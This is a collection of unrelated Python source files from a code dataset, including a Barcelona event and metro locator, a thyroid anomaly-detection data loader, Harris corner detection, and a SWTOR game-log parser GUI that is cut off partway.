Args_Metro:\n for metroBoca in root_metro.findall('Punt'):\n station = metroBoca.find('Tooltip').text\n if fm in station :\n if 'METRO' in station:\n getMetro[station] = Metro(metroBoca)\n elif 'FGC' in station:\n getMetro[station] = Metro(metroBoca) \n return getMetro\n\n\n# Parse each and every metro station!\ndef parseMetro():\n getMetro = dict()\n for metroBoca in root_metro.findall('Punt'):\n station = metroBoca.find('Tooltip').text\n if 'METRO' in station:\n getMetro[station] = Metro(metroBoca) \n elif 'FGC' in station:\n getMetro[station] = Metro(metroBoca) \n return getMetro\n\n\n# Get best 5 metro exits per event\ndef EventsWithTop5Metro(Dict, Metro):\n MetroDict = dict()\n for i in Dict: \n LisTop = list()\n for j in Metro:\n k = distances(Dict[i], Metro[j])\n if (k < 500):\n LisTop.append( (k, Metro[j].getFullName()) )\n\n ListFilt = sorted(LisTop)[:5]\n MetroDict[i] = ListFilt[:5]\n return MetroDict\n\n\n##########################\n# Functions: maths + aux #\n##########################\n\n\n#Calculating distance: First vals from origin point,\n# next vals from (potential) destination\ndef getDistance(lat_ori, lon_ori, lat_dest, lon_dest):\n Earth_radius = 6371000\n \n #Radians\n rad_lat1 = math.radians(lat_ori)\n rad_lat2 = math.radians(lat_dest)\n\n #Deltas for latitude and longitude\n DLat = math.radians(lat_dest - lat_ori) \n DLon = math.radians(lon_dest - lon_ori)\n \n #Math stuff\n sin_lat = math.sin(DLat/2) ** 2\n mults = math.cos(rad_lat2) * math.cos(rad_lat1) *math.sin(DLon/2) ** 2\n merge = sin_lat + mults\n tgs = 2*( math.atan2(math.sqrt(merge), math.sqrt(1-merge)) )\n\n return Earth_radius * tgs\n\n\ndef distances(Cand, Metro):\n lat_ori = Cand.getLatitude()\n lon_ori = Cand.getLongitude()\n lat_dest = Metro.getLatitude()\n lon_dest = Metro.getLongitude()\n\n return getDistance(lat_ori, lon_ori, lat_dest, lon_dest)\n\n#Get dictionary intersection\ndef dict_intersect(*dicts):\n comm_keys = dicts[0].keys()\n for d in dicts[1:]:\n comm_keys &= d.keys()\n\n result = { key : \n {d[key] for d in dicts} \n for key in comm_keys\n }\n return result\n\ndef clean(str):\n # NFKD for ensuring max compatibility\n normal = unicodedata.normalize('NFKD', str.lower()) \n ascii_str = normal.encode('ascii', 'ignore').decode('ascii')\n return ascii_str\n\n\ndef loadXML(N):\n if (N == 'events'):\n link = \"http://w10.bcn.es/APPS/asiasiacache/peticioXmlAsia?id=199\"\n elif (N == 'metro'):\n link0 = \"http://opendata-ajuntament.barcelona.cat/\"\n link = link0 + \"resources/bcn/TRANSPORTS GEOXML.xml\"\n \n socket = urllib.request.urlopen(link)\n xml_Source = socket.read()\n socket.close()\n return ET.fromstring(xml_Source)\n\n\n##############################\n# Functions: HTML generation #\n##############################\n\ndef inflateTable(MStats, Dict):\n strng = \"\"\n try:\n for i in Dict:\n name = Dict[i].getName()\n strng += \"<tr><td>\" + name + \"\"\"</td>\n <td>\"\"\" + Dict[i].getAddress().getName() + \"\"\"</td> \n <td>\"\"\" + Dict[i].getFullDate() + \"\"\"</td>\n <td>\"\"\" + Dict[i].getAge() + \"</td><td><ul>\"\n for j in MStats[i]:\n num = str(j[0])[:7]\n plc = str(j[1])\n strng += \"<li>\" + num + \" m <br>\" + plc + \"</li>\"\n strng += \"</ul></td></tr>\"\n return strng\n except Exception as e:\n print(\"FATAL ERROR: \", e)\n return \"\"\n\n\n\ndef createHTML(MStats, Dict):\n try:\n website = open(\"index.html\", \"w\")\n headr = \"<!DOCTYPE html><meta charset=\\\"utf-8\\\"/>\\\n <html><head><title>BCN Events [LP]
</title></head>\\\n                 <body><h1>Events pròxims:</h1>\\\n                 <table>\"\n\n        inflate = inflateTable(MStats, Dict)\n        bottom = \"<tr><th>NOM</th><th>ADREÇA</th>\\\n                 <th>DATA I HORA</th><th>EDAT RECOMANADA</th>\\\n                 <th>SORTIDA DE METRO A < 500 m</th></tr></table></body></html>
\"\n website.write(headr + inflate + bottom)\n website.close()\n return True\n except Exception as e:\n print(\"FATAL ERROR: \", e)\n return False\n\n# PRE-REQUIREMENT: Firefox installed\ndef launchHTML():\n print(\"Launching HTML on Firefox... :-)\")\n args = \"firefox index.html &\"\n os.system(args)\n\n###############################################\n# Main, except it's not defined as such (yet) #\n###############################################\n\n# XML Parsing\nroot_events = loadXML('events')\nroot_metro = loadXML('metro')\n\nif __name__ == \"__main__\":\n debug = False\n\n if (args.key): Args_Keys = fillKeys(args.key) \n if (args.date): Args_Dates = fillDate(args.date) \n if (args.metro): Args_Metro = fillMetro(args.metro) \n\n if debug:\n\n print(\"--------< List Debug >--------\")\n print(Args_Keys)\n print(Args_Dates)\n print(len(Args_Dates))\n print(Args_Metro)\n print(\"--------< /List Debug >-------\")\n \n\n print(\"Getting all activities suitable for children...\")\n\n Candidates = Children_Activities()\n \n if debug:\n for i in Candidates: \n print(Candidates[i])\n\n print(\"Filtering by keys (if any) ...\")\n\n Dict = dict()\n if (len(Args_Keys) > 0): \n Dict = { i : \n Candidates[i] for i in Candidates\n if check(Candidates[i], Args_Keys)\n }\n else: \n Dict = Candidates\n\n if debug:\n for i in Dict: print(i)\n\n print(\"Filtering by dates (if any) ...\")\n\n DictD = dict()\n if (len(Args_Dates) != 0): \n Dict = { i : \n Dict[i] for i in Dict\n if dateCheck(Dict[i], Args_Dates)\n }\n\n if debug:\n for i in Dict: print(i)\n\n print(\"Filtering selected metro lines (if any) ...\")\n\n DictM = dict()\n if (len(Args_Metro) != 0): \n DictM = parseMetroArgs(Args_Metro)\n else:\n DictM = parseMetro()\n\n\n print(\"Getting 5 nearest metro stations by event\")\n Top5 = EventsWithTop5Metro(Dict, DictM)\n \n\n print(\"Generating HTML with data\")\n web_success = createHTML(Top5, Dict)\n if web_success: \n launchHTML()\n","repo_name":"MNXANL/GRAU-LP","sub_path":"Python/PracticaPython/cerca.py","file_name":"cerca.py","file_ext":"py","file_size_in_byte":14977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"5619490603","text":"test_num = int(input())\n\nfor t in range(test_num):\n N, M = map(int,input().split())\n\n adj = [[] for i in range(N+1)]\n\n for i in range(M):\n a,b = map(int,input().split())\n adj[a].append(b)\n adj[b].append(a)\n\n # print(adj)\n visited = [False for i in range(N+1)]\n visited[1] = True\n queue = [1]\n friend_num = 0\n cnt = 0\n\n while queue:\n if cnt == 2:\n break\n cnt += 1\n for i in range(len(queue)):\n temp = queue.pop(0)\n for friend in adj[temp]:\n if not visited[friend]:\n visited[friend] = True\n friend_num += 1\n queue.append(friend)\n\n print('#' + str(t+1) + ' ',end='')\n print(friend_num)","repo_name":"seoul-ssafy-class-2-studyclub/Hyejune","sub_path":"5521_상원이의생일파티.py","file_name":"5521_상원이의생일파티.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"97"} +{"seq_id":"26580083620","text":"import os\nfrom secrets import token_hex\n\nimport cv2\n\nfrom src.yolo import detector\n\nimages_folder_path = '/home/muladzevitali/media/shop_products_bottle_2/images'\noutput_folder_path = '/home/muladzevitali/media/shop_products_bottle_2/outputs'\n\nfor image_name in os.listdir(images_folder_path):\n image_path = os.path.join(images_folder_path, image_name)\n image = cv2.imread(image_path)\n coordinates = 
detector.detect(image_path)\n    for index_, coordinate in enumerate(coordinates):\n        # Take image from half and above\n        y_start_coordinate = coordinate[1][1] - int((coordinate[1][1] - coordinate[0][1]) * 0.5)\n        cropped_image = image[coordinate[0][1]:y_start_coordinate, coordinate[0][0]: coordinate[1][0]]\n        cropped_image_path = os.path.join(output_folder_path, f'{token_hex(9)}.jpg')\n        try:\n            cv2.imwrite(cropped_image_path, cropped_image)\n        except cv2.error:\n            continue\n","repo_name":"muladzevitali/cigarette_detection","sub_path":"application/src/scripts/cut_cigarette_packs.py","file_name":"cut_cigarette_packs.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"3293966810","text":"# Implement two small scripts:\n# a) an iterator that generates integers starting from a given number,\n# b) an iterator that repeats the elements of a predefined list.\n\nfrom itertools import count, cycle\n\nwhile True:\n    try:\n        smallest_number = int(input('Enter a starting integer below 30 for the generation: '))\n        break\n    except ValueError:\n        print('Enter a number!')\n\nfor el in count(smallest_number):\n    if el > 30:\n        break\n    else:\n        print(el)\n\n# B\n\nyour_list = input('Enter the list elements separated by spaces: ').split()\n\nc = 0\nfor el in cycle(your_list):\n    if c >= 10:\n        break\n    print(el)\n    c += 1\n","repo_name":"visor517/GeekBrains_python","sub_path":"lesson4/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"73001370239","text":"from typing import Tuple\nfrom typing import Union\n\nimport numpy as np\nimport torch\nfrom torchvision import datasets\nfrom torchvision import transforms\n\nfrom datasets.base import OneClassDataset\nfrom datasets.transforms import OCToFloatTensor2D\nfrom datasets.transforms import ToFloat32\nfrom datasets.transforms import ToFloatTensor2D\nfrom datasets.transforms import ToFloatTensor2Dt\nfrom datasets.transforms import OCToFloatTensor2Dt\nimport scipy.io as io\nimport os\n# thyroid\nclass THYROID(OneClassDataset):\n\n    def __init__(self, path):\n        # type: (str) -> None\n        \"\"\"\n        Class constructor.\n        :param path: the folder containing thyroid.mat.\n        \"\"\"\n        super(THYROID, self).__init__()\n\n        self.path = path\n        data = io.loadmat(f'{path}/thyroid.mat')\n        self.normal_class = 1\n\n        self.name = 'thyroid'\n        self.train_split = {}\n        self.test_split = {}\n\n        features = data['X']\n        labels = data['y'].squeeze()\n        labels = (labels == 0)\n\n        N, self.dimension = features.shape\n\n        nominal_data = features[labels == 1, :]\n        nominal_labels = labels[labels == 1]\n\n        N_nominal = nominal_data.shape[0]\n\n        novel_data = features[labels == 0, :]\n        novel_labels = labels[labels == 0]\n\n        N_novel = novel_data.shape[0]\n\n        print(f\"thyroid:{N_novel+N_nominal}\\t N_novel:{N_novel}\\tN_nominal:{N_nominal}\\t novel-ratio:{N_novel/N_nominal}\")\n\n        randIdx = np.arange(N_nominal)\n        np.random.shuffle(randIdx)\n\n        N_train_valid = N_nominal // 2\n        N_train = int(N_train_valid * 0.9)\n        N_valid = N_train_valid - N_train\n\n        # 0.45 nominal data as training set\n        self.X_train = nominal_data[randIdx[:N_train]]\n        self.y_train = nominal_labels[randIdx[:N_train]]\n\n        # 0.05 nominal data as validation set\n        self.X_val = nominal_data[randIdx[N_train:N_train_valid]]\n        self.y_val = nominal_labels[randIdx[N_train:N_train_valid]]\n\n        
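# Label convention for this loader, fixed above by labels = (labels == 0):\n        # 1/True marks nominal samples, 0/False marks novelties. For example a\n        # raw y of [0, 1, 0] becomes [True, False, True] (nominal, novel, nominal).\n\n        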
# 0.5 nominal data + all novel data as the test set\n        self.X_test = nominal_data[randIdx[N_train_valid:]]\n        self.y_test = nominal_labels[randIdx[N_train_valid:]]\n        self.X_test = np.concatenate((self.X_test, novel_data), axis=0)\n        self.y_test = np.concatenate((self.y_test, novel_labels), axis=0)\n\n        print(f\"thyroid: train-{N_train},validation-{N_valid},test-{len(self.y_test)}(novel-ratio:{float(sum(self.y_test == 0)/len(self.y_test))})\")\n\n        # Other utilities\n        self.mode = None\n        self.length = None\n\n        # Transform zone\n        self.val_transform = transforms.Compose([ToFloatTensor2Dt()])\n        self.train_transform = transforms.Compose([ToFloatTensor2Dt()])\n        self.test_transform = transforms.Compose([ToFloat32(), OCToFloatTensor2Dt()])\n        self.transform = None\n\n    def val(self, nominal_class=1):\n        # type: (int) -> None\n        \"\"\"\n        Sets validation mode.\n        :param nominal_class: the class to be considered nominal.\n        \"\"\"\n        # Update mode, indexes, length and transform\n        self.mode = 'val'\n        self.length = len(self.y_val)\n        self.transform = self.val_transform\n\n    def train(self, nominal_class=1):\n        # type: (int) -> None\n        \"\"\"\n        Sets training mode.\n        :param nominal_class: the class to be considered nominal.\n        \"\"\"\n        self.mode = 'train'\n        self.length = len(self.y_train)\n        # manually shuffle the training examples\n        randIdx = np.arange(self.length)\n        np.random.shuffle(randIdx)\n        self.X_train = self.X_train[randIdx]\n\n        self.transform = self.train_transform\n\n    def test(self, nominal_class=1):\n        # type: (int) -> None\n        \"\"\"\n        Sets test mode.\n\n        :param nominal_class: the class to be considered nominal.\n        \"\"\"\n        # Update mode, length and transform\n        self.mode = 'test'\n\n        # testing examples (nominal + novel)\n        self.length = len(self.y_test)\n        self.transform = self.test_transform\n\n
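    # A minimal usage sketch (hypothetical path; not part of the original file):\n    #\n    #   dataset = THYROID('/data')   # expects /data/thyroid.mat\n    #   dataset.train()              # training split yields (x, x) pairs\n    #   dataset.test()               # test split yields (x, y), y = 1 nominal / 0 novel\n    #   x, y = dataset[0]            # examples are shaped (1, 6, 1)\n\n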
    def __len__(self):\n        # type: () -> int\n        \"\"\"\n        Returns the number of examples.\n        \"\"\"\n        return self.length\n\n    def __getitem__(self, i):\n        # type: (int) -> Tuple[torch.Tensor, Union[torch.Tensor, int]]\n        \"\"\"\n        Provides the i-th example.\n        \"\"\"\n\n        if self.mode == 'train':\n            x = self.X_train[i]\n            x = np.float32(x)[..., np.newaxis]\n            sample = x, x\n\n        elif self.mode == 'val':\n            x = self.X_val[i]\n            x = np.float32(x)[..., np.newaxis]\n            sample = x, x\n\n        elif self.mode == 'test':\n            x = self.X_test[i]\n            y = self.y_test[i]\n            x = np.float32(x)[..., np.newaxis]\n            sample = x, y\n\n        # Apply transform\n        if self.transform:\n            sample = self.transform(sample)\n\n        return sample\n\n    @property\n    def test_classes(self):\n        # type: () -> np.ndarray\n        \"\"\"\n        Returns all possible test classes (only the nominal class, 1).\n        \"\"\"\n        return [1]\n\n    @property\n    def train_classes(self):\n        # type: () -> np.ndarray\n        \"\"\"\n        Returns all possible train classes (only the nominal class, 1).\n        \"\"\"\n        return [1]\n\n    @property\n    def shape(self):\n        # type: () -> Tuple[int, int, int]\n        \"\"\"\n        Returns the shape of examples.\n        \"\"\"\n        return 1, 6, 1\n\n    def __repr__(self):\n        return (\"ONE-CLASS THYROID (nominal class = 1)\")\n","repo_name":"GinGinWang/MTQ","sub_path":"datasets/thyroid.py","file_name":"thyroid.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"97"} +{"seq_id":"11732940700","text":"import unittest\n\nclass TestAddNoCacheHeaders(unittest.TestCase):\n    def _callFUT(self, event):\n        from karl.handlers import add_no_cache_headers\n        return add_no_cache_headers(event)\n\n    def test_it_no_header(self):\n        headers = []\n        response = DummyResponse(headers)\n        event = DummyEvent(response)\n        self._callFUT(event)\n        self.assertEqual(\n            headers,\n            [('Cache-Control','private, must-revalidate')]\n        )\n\n    def test_it_with_header(self):\n        headers = [('Cache-Control', 'abc')]\n        response = DummyResponse(headers)\n        event = DummyEvent(response)\n        self._callFUT(event)\n        self.assertEqual(headers, [('Cache-Control', 'abc')])\n\nclass DummyEvent:\n    def __init__(self, response):\n        self.response = response\n\nclass DummyResponse:\n    def __init__(self, headerlist):\n        self.headerlist = headerlist\n","repo_name":"karlproject/karl","sub_path":"karl/tests/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"97"} +{"seq_id":"38100500890","text":"from face_recognition import FaceRecognition\n\nfile_path=\"path_of_the_file\"\nkey=\"aws_key\"\nsecret=\"aws_secret\"\ntoken=\"aws_token\"\n\ninstance = FaceRecognition(file_path,key,secret,token)\nresults = instance.detection()\n\nif isinstance(results, dict):\n    print(\"The details of the candidate are as follows: \")\n    for each_key in results.keys():\n        print(each_key + '=' + str(results[each_key]))\n\nelse:\n    print(results)","repo_name":"suyojman/genese_assignment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"30574303177","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\nfrom .utils import compute_gradient\n\n\ndef NMS(img: np.ndarray):\n    \"\"\"\n    9-point NMS\n    \"\"\"\n
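    # The mask built below marks pixels that are strictly greater than all\n    # eight neighbours (indices clipped at the image borders), i.e. the local\n    # maxima of the corner-quality map.\n    H, W = img.shape\n    center_x, center_y = np.meshgrid(np.arange(W), np.arange(H))\n    top = np.clip(center_y - 1, 0, H - 1)\n    bottom = 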
np.clip(center_y + 1, 0, H - 1)\n left = np.clip(center_x - 1, 0, W - 1)\n right = np.clip(center_x + 1, 0, W - 1)\n\n row_iters = [top, center_y, bottom]\n col_iters = [left, center_x, right]\n mask = np.ones_like(img, dtype=bool)\n\n for i, row_iter in enumerate(row_iters):\n for j, col_iter in enumerate(col_iters):\n if i == 1 and j == 1:\n continue\n mask &= (img[center_y, center_x] > img[row_iter, col_iter])\n\n return mask\n\n\ndef compute_features(img: np.ndarray, win_size=11, min_eig_th=0.05, border=20, max_num_pts=1000,\n min_dist_pix=10, if_show=False, if_return_st=False, **kwargs):\n \"\"\"\n Returns\n -------\n x, y: np.ndarray\n Locations of features in xy-coordinate, of shape (N,)\n structure_tensor: np.ndarray\n [Ix, Iy, Ixx, Iyy, Ixy] if specifies \"if_return_st = True\", otherwise this is not returned\n \"\"\"\n H, W = img.shape\n Ix, Iy = compute_gradient(img)\n Ixx = cv2.GaussianBlur(Ix ** 2, (win_size, win_size), sigmaX=0)\n Iyy = cv2.GaussianBlur(Iy ** 2, (win_size, win_size), sigmaX=0)\n Ixy = cv2.GaussianBlur(Ix * Iy, (win_size, win_size), sigmaX=0)\n\n trace = Ixx + Iyy\n det = Ixx * Iyy - Ixy ** 2\n diff_half = np.sqrt((trace / 2) ** 2 - det)\n quality = np.minimum(np.abs(trace / 2 + diff_half), np.abs(trace / 2 - diff_half)) # lambda1 or lambda2\n\n mask_border = np.zeros_like(img, dtype=bool)\n mask_border[border : H - border, border : W - border] = True\n quality *= mask_border\n mask_thresh = (quality > min_eig_th * np.max(quality))\n quality *= mask_thresh\n mask_nms = NMS(quality)\n quality *= mask_nms\n\n quality_flatten = quality.ravel()\n inds = np.argsort(quality_flatten, axis=-1)[::-1]\n inds = inds[:min(len(inds), max_num_pts)]\n ind_rows, ind_cols = np.unravel_index(inds, img.shape)\n\n # filter by min dist\n num_features = len(ind_rows)\n pts = np.concatenate([ind_cols.reshape((1, -1)), ind_rows.reshape((1, -1))], axis=0) # (2, N)\n pts_norm_sq = np.linalg.norm(pts, axis=0) ** 2 # (N,)\n D = np.tile(pts_norm_sq.reshape((-1, 1)), (1, num_features)) + \\\n np.tile(pts_norm_sq.reshape((1, -1)), (num_features, 1)) - 2 * pts.T @ pts # (N, N)\n D -= min_dist_pix ** 2\n D = np.tril(D, k=-1)\n D_sum = D.sum(axis=1) # (N,)\n inds_sel = np.argwhere(D_sum >= 0)\n ind_rows, ind_cols = ind_rows[inds_sel], ind_cols[inds_sel]\n\n if if_show:\n img_copy = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img_copy = (img_copy * 255).astype(np.uint8)\n for x, y in zip(ind_cols, ind_rows):\n img_copy = cv2.drawMarker(img_copy, (x, y), color=(0, 0, 255), markerSize=kwargs.get(\"markerSize\", 10),\n thickness=kwargs.get(\"thickness\", 2), line_type=cv2.LINE_AA)\n\n plt.imshow(cv2.cvtColor(img_copy, cv2.COLOR_BGR2RGB))\n plt.show()\n\n ind_cols = ind_cols.ravel()\n ind_rows = ind_rows.ravel()\n\n if if_return_st:\n return ind_cols, ind_rows, [Ix, Iy, Ixx, Iyy, Ixy]\n\n return ind_cols, ind_rows\n","repo_name":"10258392511/ImageAnalysis","sub_path":"3DVision/3d_ch4/helpers/harris_corner.py","file_name":"harris_corner.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"1486359483","text":"import threading\nimport time\nimport psutil\nimport os\nimport sys\n# UI Libraries\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\n# Project Modules\nfrom network.discord import DiscordClient\nfrom parsing.realtime import RealTimeParser\nfrom toplevels.minimap import MiniMap\nfrom widgets.events import EventOverlay\nfrom utils.swtor import 
get_swtor_screen_mode\nfrom utils.admin import check_privileges\nfrom widgets.results.time_view import TimeView\nfrom variables import settings\n\n\nclass RealTimeFrame(ttk.Frame):\n \"\"\"\n A Frame that contains all the necessary widgets to control a\n RealTimeParser instance.\n \"\"\"\n\n DATA_STR_BASE = \"Slow screen results features:\\n\\n{}\"\n\n def __init__(self, master, window):\n ttk.Frame.__init__(self, master)\n \"\"\"\n Attributes \n \"\"\"\n self.window = window\n self.after_id = None\n self._rtp_id = None\n self.parser = None\n self.overlay = None\n self.overlay_after_id = None\n self.data_after_id = None\n self._event_overlay = None\n\n # Watching Label\n self.watching_stringvar = tk.StringVar(self, value=\"Watching no file...\")\n self.watching_label = ttk.Label(self, textvariable=self.watching_stringvar, justify=tk.LEFT)\n self.cpu_stringvar = tk.StringVar()\n self.cpu_label = ttk.Label(self, textvariable=self.cpu_stringvar, justify=tk.LEFT, font=\"TkFixedFont\")\n\n # Control widgets\n servers = (\"Choose Server\",) + tuple(self.window.characters_frame.servers.values())\n self.server, self.character = tk.StringVar(), tk.StringVar()\n self.server_dropdown = ttk.OptionMenu(self, self.server, *servers, command=self.update_characters)\n self.character_dropdown = ttk.OptionMenu(self, self.character, *(\"Choose Character\",))\n self.parsing_control_button = ttk.Button(self, text=\"Start Parsing\", command=self.start_parsing, width=20)\n\n # Data widgets\n self.data = tk.StringVar(value=self.DATA_STR_BASE.format(\"Not real-time parsing\\n\"))\n self.data_label = ttk.Label(\n self, textvariable=self.data, font=(\"Consolas\", 9), justify=tk.LEFT,\n wraplength=300)\n self.time_view = TimeView(self, height=6, width=1.5)\n self.time_scroll = ttk.Scrollbar(self, command=self.time_view.yview)\n self.time_view.config(yscrollcommand=self.time_scroll.set)\n\n # MiniMap widgets\n self.minimap_enabled = tk.BooleanVar()\n self.minimap_checkbox = ttk.Checkbutton(self, text=\"MiniMap Location Sharing\", variable=self.minimap_enabled)\n self.minimap_address = tk.StringVar(self, \"Address : Port\")\n self.minimap_name = tk.StringVar(self, \"Username\")\n self.minimap_name_entry = ttk.Entry(self, width=25, textvariable=self.minimap_name)\n self.minimap_address_entry = ttk.Entry(self, width=25, textvariable=self.minimap_address)\n self.minimap = None\n\n # Start monitoring CPU usage\n self.process = psutil.Process(os.getpid())\n self.after(1000, self.update_cpu_usage)\n\n def grid_widgets(self):\n \"\"\"Put all widgets into place\"\"\"\n self.server_dropdown.grid(row=0, column=0, sticky=\"nswe\", padx=5, pady=5)\n self.character_dropdown.grid(row=1, column=0, sticky=\"nswe\", padx=5, pady=(0, 5))\n self.parsing_control_button.grid(row=2, column=0, sticky=\"nswe\", padx=5, pady=5)\n\n self.minimap_checkbox.grid(row=0, column=1, sticky=\"nsw\", padx=5, pady=5)\n self.minimap_name_entry.grid(row=1, column=1, sticky=\"nsw\", padx=5, pady=(0, 5))\n self.minimap_address_entry.grid(row=2, column=1, sticky=\"nsw\", padx=5, pady=5)\n\n self.data_label.grid(row=0, column=2, rowspan=3, columnspan=2, sticky=\"nwe\", padx=(0, 5), pady=5)\n self.time_view.grid(row=3, column=0, columnspan=4, sticky=\"nswe\", padx=5, pady=5)\n\n self.watching_label.grid(row=4, column=0, columnspan=4, sticky=\"nw\", padx=5, pady=5)\n self.cpu_label.grid(row=4, column=2, sticky=\"nw\", padx=5, pady=5)\n\n def check_parser_start(self) -> bool:\n \"\"\"Check if a RealTimeParser can be started\"\"\"\n if self.character_data is 
None:\n messagebox.showinfo(\"Info\", \"Please select a valid character using the dropdowns.\")\n return False\n if settings[\"overlay\"][\"enabled\"] or settings[\"screen\"][\"enabled\"]:\n if get_swtor_screen_mode() is False:\n return False\n if \"Mouse and Keyboard\" in settings[\"screen\"][\"features\"] and sys.platform != \"linux\":\n if not check_privileges():\n messagebox.showinfo(\n \"Info\", \"Mouse and keyboard results is enabled, but the GSF Parser is not running as \"\n \"administrator, which prevents reading input from the SWTOR window. Please restart the \"\n \"GSF Parser as administrator for this feature to work.\")\n return True\n\n def start_parsing(self):\n \"\"\"Start the results process and open the Overlay\"\"\"\n if self.check_parser_start() is False:\n return\n self.parsing_control_button.config(state=tk.DISABLED)\n self.parsing_control_button.update()\n # Setup attributes\n args = (self.window.characters_frame.characters, self.character_data,\n self.window.builds_frame.ships_data, self.window.builds_frame.companions_data)\n # Create MiniMap window\n if self.minimap_enabled.get() is True:\n self.minimap = MiniMap(self.window)\n # Generate kwargs\n kwargs = {\n \"spawn_callback\": self.spawn_callback,\n \"match_callback\": self.match_callback,\n \"file_callback\": self.file_callback,\n \"event_callback\": self.event_callback,\n \"minimap_share\": self.minimap_enabled.get(),\n \"minimap_user\": self.minimap_name.get(),\n \"minimap_address\": self.minimap_address.get(),\n \"minimap_window\": self.minimap,\n \"rpc\": self.window.rpc,\n }\n try:\n self.parser = RealTimeParser(*args, **kwargs)\n except Exception as e:\n messagebox.showerror(\n \"Error\",\n \"An error occurred during the initialization of the RealTimeParser. Please report the error given \"\n \"below, as well as, if possible, the full stack-trace to the developer.\\n\\n{}\".format(e))\n raise\n # Change Button state\n self.parsing_control_button.config(text=\"Stop Parsing\", command=self.stop_parsing)\n self.watching_stringvar.set(\"Waiting for a CombatLog...\")\n self.open_overlay()\n self.open_event_overlay()\n self.update_data_string()\n # Start the parser\n self.parser.start()\n self._rtp_id = self.after(100, self.check_alive)\n self.data_after_id = self.after(1000, self.update_data_string)\n self.parsing_control_button.config(state=tk.NORMAL)\n print(\"[RealTimeFrame] Parsing started. 
Threads: {}\".format(threading.enumerate()))\n\n def stop_parsing(self):\n \"\"\"Stop the results process\"\"\"\n if self.parser._scoreboard_parser is not None:\n messagebox.showwarning(\"Warning\", \"Parsing cannot be stopped while results a scoreboard.\")\n return\n self.parsing_control_button.config(state=tk.DISABLED)\n self.parsing_control_button.update()\n if self.minimap_enabled.get() is True and self.minimap is not None:\n self.minimap.destroy()\n self.close_overlay()\n self.parser.stop()\n self.parsing_control_button.config(text=\"Start Parsing\", command=self.start_parsing)\n time.sleep(0.1)\n try:\n self.parser.join(timeout=2)\n except Exception as e:\n messagebox.showerror(\"Error\", \"While real-time parsing, the following error occurred:\\n\\n{}\".format(e))\n raise\n self.watching_stringvar.set(\"Watching no file...\")\n print(\"[RealTimeFrame] RealTimeParser reference count: {}\".format(sys.getrefcount(self.parser)))\n self.parser = None\n self.close_overlay()\n DiscordClient().send_recent_files(self.window)\n self.window.update_presence()\n self.parsing_control_button.config(state=tk.NORMAL)\n self.data.set(self.DATA_STR_BASE.format(\"Not real-time parsing\\n\"))\n\n def file_callback(self, file_name):\n \"\"\"LogStalker new file callback to set file name in label\"\"\"\n print(\"[RealTimeParser] New file {}\".format(file_name))\n self.watching_stringvar.set(\"Watching: {}\".format(file_name))\n\n def match_callback(self, match: bool=False):\n \"\"\"Callback for the RealTimeParser to clear the TimeView\"\"\"\n self.time_view.delete_all()\n\n def spawn_callback(self):\n \"\"\"Callback for the RealTimeParser to clear the TimeView\"\"\"\n self.time_view.delete_all()\n\n def event_callback(self, event, player_name, active_ids, start_time):\n \"\"\"RealTimeParser event callback for TimeView insertion\"\"\"\n self.time_view.insert_event(event, player_name, active_ids, start_time)\n self.time_view.yview_moveto(1.0)\n if self._event_overlay is not None:\n self._event_overlay.process_event(event, active_ids)\n\n def update_cpu_usage(self):\n \"\"\"Update the CPU usage Label every two seconds\"\"\"\n string = \"CPU: {:4.1f}%\".format(self.process.cpu_percent())\n assert isinstance(self.process, psutil.Process)\n memory = self.process.memory_full_info().rss / 1024 ** 2\n string += \", Memory: {:5.1f}MiB\".format(memory)\n self.after(2000, self.update_cpu_usage)\n if self.parser is not None and self.parser.diff is not None:\n diff = self.parser.diff\n string += \", Cycle Time: {:.03f}s\".format(diff.total_seconds())\n else:\n string += \", Cycle Time: -.---s\"\n self.cpu_stringvar.set(string)\n\n def open_overlay(self):\n \"\"\"Open an overlay if the settings given by the user allow for it\"\"\"\n if settings[\"overlay\"][\"enabled\"] is False:\n return\n from widgets.overlays import Overlay\n # Generate arguments for Overlay.__init__\n position = settings[\"overlay\"][\"position\"]\n x, y = position.split(\"y\")\n x, y = int(x[1:]), int(y)\n self.overlay = Overlay((x, y), master=self.window)\n self.update_overlay()\n\n def open_event_overlay(self):\n \"\"\"Open an EventOverlay if it is enabled in settings\"\"\"\n if settings[\"event\"][\"enabled\"] is False:\n return\n x, y = settings[\"event\"][\"position\"].split(\"y\")\n x, y = int(x[1:]), int(y)\n self._event_overlay = EventOverlay(self.window, location=(x, y))\n\n def update_data_string(self):\n \"\"\"Update the string in the data label with the parser stats\"\"\"\n if self.parser is None:\n if self.data_after_id is not None:\n 
